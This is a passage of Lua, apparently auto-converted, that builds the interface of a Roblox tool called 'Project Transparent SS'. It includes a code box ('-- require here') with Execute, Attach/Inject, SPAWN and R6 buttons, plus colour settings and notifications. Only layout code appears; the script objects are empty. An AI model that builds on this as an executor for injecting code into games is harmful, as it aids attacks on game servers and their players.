G2L["51"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["51"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["51"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["51"]["Size"] = UDim2.new(0, 361, 0, 260);
G2L["51"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["51"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["51"]["ScrollBarThickness"] = 3;
G2L["51"]["BackgroundTransparency"] = 1;


-- StarterGui.ScreenGui.Frame.page4.ScrollingFrame.LocalScript
G2L["52"] = Instance.new("LocalScript", G2L["51"]);



-- StarterGui.ScreenGui.Frame.page4.ScrollingFrame.UIListLayout
G2L["53"] = Instance.new("UIListLayout", G2L["51"]);
G2L["53"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.ImageButton
G2L["54"] = Instance.new("ImageButton", G2L["3"]);
G2L["54"]["BorderSizePixel"] = 0;
G2L["54"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["54"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["54"]["Image"] = [[rbxassetid://101630023371308]];
G2L["54"]["Size"] = UDim2.new(0, 43, 0, 43);
G2L["54"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["54"]["Position"] = UDim2.new(0, 0, 0.55743, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["55"] = Instance.new("LocalScript", G2L["54"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["56"] = Instance.new("UIStroke", G2L["54"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["57"] = Instance.new("UIStroke", G2L["54"]);
G2L["57"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5
G2L["58"] = Instance.new("Frame", G2L["3"]);
G2L["58"]["Visible"] = false;
G2L["58"]["BorderSizePixel"] = 0;
G2L["58"]["BackgroundColor3"] = Color3.fromRGB(91, 91, 91);
G2L["58"]["Size"] = UDim2.new(0, 361, 0, 260);
G2L["58"]["Position"] = UDim2.new(0.11302, 0, 0.12162, 0);
G2L["58"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["58"]["Name"] = [[page5]];
G2L["58"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.page5.TextLabel
G2L["59"] = Instance.new("TextLabel", G2L["58"]);
G2L["59"]["TextWrapped"] = true;
G2L["59"]["BorderSizePixel"] = 0;
G2L["59"]["TextSize"] = 14;
G2L["59"]["TextScaled"] = true;
G2L["59"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["59"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["59"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["59"]["BackgroundTransparency"] = 1;
G2L["59"]["Size"] = UDim2.new(0, 200, 0, 25);
G2L["59"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["59"]["Text"] = [[Settings]];
G2L["59"]["Position"] = UDim2.new(0.22161, 0, 0, 0);


-- StarterGui.ScreenGui.Frame.page5.TextLabel.UIStroke
G2L["5a"] = Instance.new("UIStroke", G2L["59"]);



-- StarterGui.ScreenGui.Frame.page5.TextLabel
G2L["5b"] = Instance.new("TextLabel", G2L["58"]);
G2L["5b"]["TextWrapped"] = true;
G2L["5b"]["BorderSizePixel"] = 0;
G2L["5b"]["TextSize"] = 14;
G2L["5b"]["TextScaled"] = true;
G2L["5b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5b"]["BackgroundTransparency"] = 1;
G2L["5b"]["Size"] = UDim2.new(0, 120, 0, 25);
G2L["5b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5b"]["Text"] = [[Theme color]];
G2L["5b"]["Position"] = UDim2.new(0, 0, 0.13077, 0);


-- StarterGui.ScreenGui.Frame.page5.TextLabel.UIStroke
G2L["5c"] = Instance.new("UIStroke", G2L["5b"]);



-- StarterGui.ScreenGui.Frame.page5.TextLabel.UIStroke
G2L["5d"] = Instance.new("UIStroke", G2L["5b"]);
G2L["5d"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5.TextButton
G2L["5e"] = Instance.new("TextButton", G2L["58"]);
G2L["5e"]["BorderSizePixel"] = 0;
G2L["5e"]["TextSize"] = 14;
G2L["5e"]["TextColor3"] = Color3.fromRGB(76, 76, 76);
G2L["5e"]["BackgroundColor3"] = Color3.fromRGB(80, 80, 80);
G2L["5e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5e"]["BackgroundTransparency"] = 1;
G2L["5e"]["Size"] = UDim2.new(0, 90, 0, 25);
G2L["5e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5e"]["Text"] = [[Default]];
G2L["5e"]["Position"] = UDim2.new(0.33241, 0, 0.13077, 0);


-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
G2L["5f"] = Instance.new("LocalScript", G2L["5e"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["60"] = Instance.new("UIStroke", G2L["5e"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["61"] = Instance.new("UIStroke", G2L["5e"]);
G2L["61"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5.TextButton.Notifier
G2L["62"] = Instance.new("LocalScript", G2L["5e"]);
G2L["62"]["Name"] = [[Notifier]];


-- StarterGui.ScreenGui.Frame.page5.TextButton
G2L["63"] = Instance.new("TextButton", G2L["58"]);
G2L["63"]["BorderSizePixel"] = 0;
G2L["63"]["TextSize"] = 14;
G2L["63"]["TextColor3"] = Color3.fromRGB(171, 0, 0);
G2L["63"]["BackgroundColor3"] = Color3.fromRGB(80, 80, 80);
G2L["63"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["63"]["BackgroundTransparency"] = 1;
G2L["63"]["Size"] = UDim2.new(0, 90, 0, 25);
G2L["63"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["63"]["Text"] = [[Red]];
G2L["63"]["Position"] = UDim2.new(0.58172, 0, 0.13077, 0);


-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
G2L["64"] = Instance.new("LocalScript", G2L["63"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["65"] = Instance.new("UIStroke", G2L["63"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["66"] = Instance.new("UIStroke", G2L["63"]);
G2L["66"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5.TextButton.Notifier
G2L["67"] = Instance.new("LocalScript", G2L["63"]);
G2L["67"]["Name"] = [[Notifier]];


-- StarterGui.ScreenGui.Frame.page5.TextButton
G2L["68"] = Instance.new("TextButton", G2L["58"]);
G2L["68"]["BorderSizePixel"] = 0;
G2L["68"]["TextSize"] = 14;
G2L["68"]["TextColor3"] = Color3.fromRGB(0, 0, 255);
G2L["68"]["BackgroundColor3"] = Color3.fromRGB(80, 80, 80);
G2L["68"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["68"]["BackgroundTransparency"] = 1;
G2L["68"]["Size"] = UDim2.new(0, 61, 0, 25);
G2L["68"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["68"]["Text"] = [[Blue]];
G2L["68"]["Position"] = UDim2.new(0.83102, 0, 0.13077, 0);


-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
G2L["69"] = Instance.new("LocalScript", G2L["68"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["6a"] = Instance.new("UIStroke", G2L["68"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["6b"] = Instance.new("UIStroke", G2L["68"]);
G2L["6b"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5.TextButton.Notifier
G2L["6c"] = Instance.new("LocalScript", G2L["68"]);
G2L["6c"]["Name"] = [[Notifier]];


-- StarterGui.ScreenGui.Frame.page5.TextButton
G2L["6d"] = Instance.new("TextButton", G2L["58"]);
G2L["6d"]["BorderSizePixel"] = 0;
G2L["6d"]["TextSize"] = 14;
G2L["6d"]["TextColor3"] = Color3.fromRGB(0, 255, 0);
G2L["6d"]["BackgroundColor3"] = Color3.fromRGB(80, 80, 80);
G2L["6d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6d"]["BackgroundTransparency"] = 1;
G2L["6d"]["Size"] = UDim2.new(0, 61, 0, 25);
G2L["6d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6d"]["Text"] = [[Green]];
G2L["6d"]["Position"] = UDim2.new(0, 0, 0.23462, 0);


-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
G2L["6e"] = Instance.new("LocalScript", G2L["6d"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["6f"] = Instance.new("UIStroke", G2L["6d"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["70"] = Instance.new("UIStroke", G2L["6d"]);
G2L["70"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5.TextButton.Notifier
G2L["71"] = Instance.new("LocalScript", G2L["6d"]);
G2L["71"]["Name"] = [[Notifier]];


-- StarterGui.ScreenGui.Frame.page5.TextButton
G2L["72"] = Instance.new("TextButton", G2L["58"]);
G2L["72"]["BorderSizePixel"] = 0;
G2L["72"]["TextSize"] = 14;
G2L["72"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["72"]["BackgroundColor3"] = Color3.fromRGB(80, 80, 80);
G2L["72"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["72"]["BackgroundTransparency"] = 1;
G2L["72"]["Size"] = UDim2.new(0, 59, 0, 25);
G2L["72"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["72"]["Text"] = [[White]];
G2L["72"]["Position"] = UDim2.new(0.16898, 0, 0.23462, 0);


-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
G2L["73"] = Instance.new("LocalScript", G2L["72"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["74"] = Instance.new("UIStroke", G2L["72"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["75"] = Instance.new("UIStroke", G2L["72"]);
G2L["75"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5.TextButton.Notifier
G2L["76"] = Instance.new("LocalScript", G2L["72"]);
G2L["76"]["Name"] = [[Notifier]];


-- StarterGui.ScreenGui.Frame.page5.TextButton
G2L["77"] = Instance.new("TextButton", G2L["58"]);
G2L["77"]["BorderSizePixel"] = 0;
G2L["77"]["TextSize"] = 14;
G2L["77"]["TextColor3"] = Color3.fromRGB(171, 0, 255);
G2L["77"]["BackgroundColor3"] = Color3.fromRGB(80, 80, 80);
G2L["77"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["77"]["BackgroundTransparency"] = 1;
G2L["77"]["Size"] = UDim2.new(0, 90, 0, 25);
G2L["77"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["77"]["Text"] = [[Purple]];
G2L["77"]["Position"] = UDim2.new(0.33241, 0, 0.23462, 0);


-- StarterGui.ScreenGui.Frame.page5.TextButton.LocalScript
G2L["78"] = Instance.new("LocalScript", G2L["77"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["79"] = Instance.new("UIStroke", G2L["77"]);



-- StarterGui.ScreenGui.Frame.page5.TextButton.UIStroke
G2L["7a"] = Instance.new("UIStroke", G2L["77"]);
G2L["7a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5.TextButton.Notifier
G2L["7b"] = Instance.new("LocalScript", G2L["77"]);
G2L["7b"]["Name"] = [[Notifier]];


-- StarterGui.ScreenGui.Frame.page5.NotifierModule
G2L["7c"] = Instance.new("ModuleScript", G2L["58"]);
G2L["7c"]["Name"] = [[NotifierModule]];


-- StarterGui.ScreenGui.Frame.ImageButton
G2L["7d"] = Instance.new("ImageButton", G2L["3"]);
-- [ERROR] cannot convert HoverImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["7d"]["BorderSizePixel"] = 0;
G2L["7d"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["7d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7d"]["Image"] = [[rbxassetid://484211948]];
G2L["7d"]["Size"] = UDim2.new(0, 43, 0, 43);
G2L["7d"]["HoverImage"] = [[rbxassetid://%lld]];
G2L["7d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7d"]["Position"] = UDim2.new(0, 0, 0.7027, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["7e"] = Instance.new("LocalScript", G2L["7d"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["7f"] = Instance.new("UIStroke", G2L["7d"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["80"] = Instance.new("UIStroke", G2L["7d"]);
G2L["80"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page2
G2L["81"] = Instance.new("Frame", G2L["3"]);
G2L["81"]["Visible"] = false;
G2L["81"]["BorderSizePixel"] = 0;
G2L["81"]["BackgroundColor3"] = Color3.fromRGB(91, 91, 91);
G2L["81"]["Size"] = UDim2.new(0, 361, 0, 260);
G2L["81"]["Position"] = UDim2.new(0.11302, 0, 0.12162, 0);
G2L["81"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["81"]["Name"] = [[page2]];
G2L["81"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.page2.Text
G2L["82"] = Instance.new("ScrollingFrame", G2L["81"]);
G2L["82"]["Active"] = true;
G2L["82"]["BorderSizePixel"] = 0;
G2L["82"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["82"]["BackgroundColor3"] = Color3.fromRGB(113, 113, 113);
G2L["82"]["Name"] = [[Text]];
G2L["82"]["AutomaticCanvasSize"] = Enum.AutomaticSize.XY;
G2L["82"]["Size"] = UDim2.new(1, 0, 0.83077, 0);
G2L["82"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["82"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["82"]["ScrollBarThickness"] = 5;
G2L["82"]["BackgroundTransparency"] = 1;


-- StarterGui.ScreenGui.Frame.page2.Text.LocalScript
G2L["83"] = Instance.new("LocalScript", G2L["82"]);



-- StarterGui.ScreenGui.Frame.page2.Text.SyntaxScript
G2L["84"] = Instance.new("LocalScript", G2L["82"]);
G2L["84"]["Name"] = [[SyntaxScript]];


-- StarterGui.ScreenGui.Frame.page2.Text.UIStroke
G2L["85"] = Instance.new("UIStroke", G2L["82"]);



-- StarterGui.ScreenGui.Frame.page2.Text.TextLabel
G2L["86"] = Instance.new("TextLabel", G2L["82"]);
G2L["86"]["LineHeight"] = 1.01;
G2L["86"]["BorderSizePixel"] = 0;
G2L["86"]["TextSize"] = 14;
G2L["86"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["86"]["BackgroundColor3"] = Color3.fromRGB(75, 75, 75);
G2L["86"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["86"]["TextColor3"] = Color3.fromRGB(191, 191, 191);
G2L["86"]["BackgroundTransparency"] = 1;
G2L["86"]["Size"] = UDim2.new(0, 28, 0, 216);
G2L["86"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["86"]["Text"] = [[1]];
G2L["86"]["AutomaticSize"] = Enum.AutomaticSize.Y;
G2L["86"]["Position"] = UDim2.new(0, 0, -0.00477, 0);


-- StarterGui.ScreenGui.Frame.page2.Text.TextLabel.y
G2L["87"] = Instance.new("UIStroke", G2L["86"]);
G2L["87"]["Name"] = [[y]];


-- StarterGui.ScreenGui.Frame.page2.Text.TextLabel.UIStroke
G2L["88"] = Instance.new("UIStroke", G2L["86"]);
G2L["88"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page2.Text.TextBox
G2L["89"] = Instance.new("TextBox", G2L["82"]);
G2L["89"]["LineHeight"] = 1.01;
G2L["89"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["89"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["89"]["BorderSizePixel"] = 0;
G2L["89"]["TextSize"] = 14;
G2L["89"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["89"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["89"]["BackgroundColor3"] = Color3.fromRGB(101, 101, 101);
G2L["89"]["RichText"] = true;
G2L["89"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["89"]["AutomaticSize"] = Enum.AutomaticSize.XY;
G2L["89"]["MultiLine"] = true;
G2L["89"]["ClearTextOnFocus"] = false;
G2L["89"]["PlaceholderText"] = [[-- require here]];
G2L["89"]["Size"] = UDim2.new(0, 332, 0, 216);
G2L["89"]["Position"] = UDim2.new(0.07756, 0, -0.00477, 0);
G2L["89"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["89"]["Text"] = [[]];
G2L["89"]["BackgroundTransparency"] = 1;


-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.LocalScript
G2L["8a"] = Instance.new("LocalScript", G2L["89"]);



-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.LocalScript
G2L["8b"] = Instance.new("LocalScript", G2L["89"]);



-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.Completor
G2L["8c"] = Instance.new("LocalScript", G2L["89"]);
G2L["8c"]["Name"] = [[Completor]];


-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.UIStroke
G2L["8d"] = Instance.new("UIStroke", G2L["89"]);
G2L["8d"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["8d"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.y
G2L["8e"] = Instance.new("UIStroke", G2L["89"]);
G2L["8e"]["Name"] = [[y]];


-- StarterGui.ScreenGui.Frame.page2.Text.Syntax
G2L["8f"] = Instance.new("TextLabel", G2L["82"]);
G2L["8f"]["LineHeight"] = 1.01;
G2L["8f"]["BorderSizePixel"] = 0;
G2L["8f"]["TextSize"] = 14;
G2L["8f"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["8f"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["8f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8f"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["8f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8f"]["BackgroundTransparency"] = 1;
G2L["8f"]["RichText"] = true;
G2L["8f"]["Size"] = UDim2.new(0, 332, 0, 216);
G2L["8f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8f"]["Text"] = [[]];
G2L["8f"]["AutomaticSize"] = Enum.AutomaticSize.XY;
G2L["8f"]["Name"] = [[Syntax]];
G2L["8f"]["Position"] = UDim2.new(0.078, 0, -0.005, 0);


-- StarterGui.ScreenGui.Frame.page2.Execute
G2L["90"] = Instance.new("TextButton", G2L["81"]);
G2L["90"]["TextWrapped"] = true;
G2L["90"]["BorderSizePixel"] = 0;
G2L["90"]["TextSize"] = 14;
G2L["90"]["TextScaled"] = true;
G2L["90"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["90"]["BackgroundColor3"] = Color3.fromRGB(84, 84, 84);
G2L["90"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["90"]["BackgroundTransparency"] = 1;
G2L["90"]["Size"] = UDim2.new(0, 89, 0, 41);
G2L["90"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["90"]["Text"] = [[Execute]];
G2L["90"]["Name"] = [[Execute]];
G2L["90"]["Position"] = UDim2.new(0, 0, 0.83846, 0);


-- StarterGui.ScreenGui.Frame.page2.Execute.UIStroke
G2L["91"] = Instance.new("UIStroke", G2L["90"]);



-- StarterGui.ScreenGui.Frame.page2.Execute.UIStroke
G2L["92"] = Instance.new("UIStroke", G2L["90"]);
G2L["92"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["92"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.page2.Clear
G2L["93"] = Instance.new("TextButton", G2L["81"]);
G2L["93"]["TextWrapped"] = true;
G2L["93"]["BorderSizePixel"] = 0;
G2L["93"]["TextSize"] = 14;
G2L["93"]["TextScaled"] = true;
G2L["93"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["93"]["BackgroundColor3"] = Color3.fromRGB(84, 84, 84);
G2L["93"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["93"]["BackgroundTransparency"] = 1;
G2L["93"]["Size"] = UDim2.new(0, 94, 0, 41);
G2L["93"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["93"]["Text"] = [[Clear]];
G2L["93"]["Name"] = [[Clear]];
G2L["93"]["Position"] = UDim2.new(0.24654, 0, 0.83846, 0);


-- StarterGui.ScreenGui.Frame.page2.Clear.UIStroke
G2L["94"] = Instance.new("UIStroke", G2L["93"]);



-- StarterGui.ScreenGui.Frame.page2.Clear.UIStroke
G2L["95"] = Instance.new("UIStroke", G2L["93"]);
G2L["95"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["95"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.page2.Inject
G2L["96"] = Instance.new("TextButton", G2L["81"]);
G2L["96"]["TextWrapped"] = true;
G2L["96"]["BorderSizePixel"] = 0;
G2L["96"]["TextSize"] = 14;
G2L["96"]["TextScaled"] = true;
G2L["96"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["96"]["BackgroundColor3"] = Color3.fromRGB(84, 84, 84);
G2L["96"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["96"]["BackgroundTransparency"] = 1;
G2L["96"]["Size"] = UDim2.new(0, 75, 0, 41);
G2L["96"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["96"]["Text"] = [[Attach]];
G2L["96"]["Name"] = [[Inject]];
G2L["96"]["Position"] = UDim2.new(0.50693, 0, 0.83846, 0);


-- StarterGui.ScreenGui.Frame.page2.Inject.UIStroke
G2L["97"] = Instance.new("UIStroke", G2L["96"]);



-- StarterGui.ScreenGui.Frame.page2.Inject.UIStroke
G2L["98"] = Instance.new("UIStroke", G2L["96"]);
G2L["98"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["98"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.page2.RE
G2L["99"] = Instance.new("TextButton", G2L["81"]);
G2L["99"]["TextWrapped"] = true;
G2L["99"]["BorderSizePixel"] = 0;
G2L["99"]["TextSize"] = 14;
G2L["99"]["TextScaled"] = true;
G2L["99"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["99"]["BackgroundColor3"] = Color3.fromRGB(84, 84, 84);
G2L["99"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["99"]["BackgroundTransparency"] = 1;
G2L["99"]["Size"] = UDim2.new(0, 58, 0, 41);
G2L["99"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["99"]["Text"] = [[SPAWN]];
G2L["99"]["Name"] = [[RE]];
G2L["99"]["Position"] = UDim2.new(0.71468, 0, 0.83846, 0);


-- StarterGui.ScreenGui.Frame.page2.RE.UIStroke
G2L["9a"] = Instance.new("UIStroke", G2L["99"]);



-- StarterGui.ScreenGui.Frame.page2.RE.UIStroke
G2L["9b"] = Instance.new("UIStroke", G2L["99"]);
G2L["9b"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["9b"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.page2.R6
G2L["9c"] = Instance.new("TextButton", G2L["81"]);
G2L["9c"]["TextWrapped"] = true;
G2L["9c"]["BorderSizePixel"] = 0;
G2L["9c"]["TextSize"] = 14;
G2L["9c"]["TextScaled"] = true;
G2L["9c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["9c"]["BackgroundColor3"] = Color3.fromRGB(84, 84, 84);
G2L["9c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["9c"]["BackgroundTransparency"] = 1;
G2L["9c"]["Size"] = UDim2.new(0, 44, 0, 41);
G2L["9c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9c"]["Text"] = [[R6]];
G2L["9c"]["Name"] = [[R6]];
G2L["9c"]["Position"] = UDim2.new(0.87535, 0, 0.83846, 0);


-- StarterGui.ScreenGui.Frame.page2.R6.UIStroke
G2L["9d"] = Instance.new("UIStroke", G2L["9c"]);



-- StarterGui.ScreenGui.Frame.page2.R6.UIStroke
G2L["9e"] = Instance.new("UIStroke", G2L["9c"]);
G2L["9e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["9e"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.UICorner
G2L["9f"] = Instance.new("UICorner", G2L["3"]);



-- StarterGui.ScreenGui.Notify
G2L["a0"] = Instance.new("Folder", G2L["1"]);
G2L["a0"]["Name"] = [[Notify]];


-- StarterGui.ScreenGui.Notify.SuccessEvent
G2L["a1"] = Instance.new("BindableEvent", G2L["a0"]);
G2L["a1"]["Name"] = [[SuccessEvent]];


-- StarterGui.ScreenGui.Notify.UnSuccessEvent
G2L["a2"] = Instance.new("BindableEvent", G2L["a0"]);
G2L["a2"]["Name"] = [[UnSuccessEvent]];


-- StarterGui.ScreenGui.Notify.ScriptRanEvent
G2L["a3"] = Instance.new("BindableEvent", G2L["a0"]);
G2L["a3"]["Name"] = [[ScriptRanEvent]];


-- StarterGui.ScreenGui.Notify.Frame
G2L["a4"] = Instance.new("Frame", G2L["a0"]);
G2L["a4"]["BorderSizePixel"] = 0;
G2L["a4"]["BackgroundColor3"] = Color3.fromRGB(61, 61, 61);
G2L["a4"]["Size"] = UDim2.new(0.23857, 0, 0.12376, 0);
G2L["a4"]["Position"] = UDim2.new(0.75207, 0, 0.86124, 0);
G2L["a4"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a4"]["BackgroundTransparency"] = 0.3;


-- StarterGui.ScreenGui.Notify.Frame.UICorner
G2L["a5"] = Instance.new("UICorner", G2L["a4"]);



-- StarterGui.ScreenGui.Notify.Frame.UIStroke
G2L["a6"] = Instance.new("UIStroke", G2L["a4"]);
G2L["a6"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Notify.Frame.Main
G2L["a7"] = Instance.new("Folder", G2L["a4"]);
G2L["a7"]["Name"] = [[Main]];


-- StarterGui.ScreenGui.Notify.Frame.Main.Title
G2L["a8"] = Instance.new("TextLabel", G2L["a7"]);
G2L["a8"]["TextWrapped"] = true;
G2L["a8"]["BorderSizePixel"] = 0;
G2L["a8"]["TextSize"] = 14;
G2L["a8"]["TextScaled"] = true;
G2L["a8"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a8"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["a8"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a8"]["BackgroundTransparency"] = 1;
G2L["a8"]["Size"] = UDim2.new(1.01656, 0, 0.2, 0);
G2L["a8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a8"]["Text"] = [[Project Transparent SS]];
